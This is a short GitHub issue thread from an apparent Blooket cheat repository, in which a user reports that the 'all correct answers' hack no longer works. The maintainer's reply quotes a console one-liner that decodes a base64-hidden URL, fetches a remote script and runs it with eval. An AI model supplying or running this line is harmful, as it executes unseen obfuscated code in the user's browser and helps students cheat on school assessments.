### ISSUE TITLE
All correct answers is not working

### ISSUE THREAD

**Issue by kidney-bean** [glixzzy/blooket-hack#483]
No errors in console or anything, its just not working.

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by kidney-bean** [comment]
I use Google chrome. I am on my PC, using the school wifi. I tried both bookmarker and copy paste in console. The code has worked before. I am using the original code.

**Comment by glixzzy** [comment]
fixed
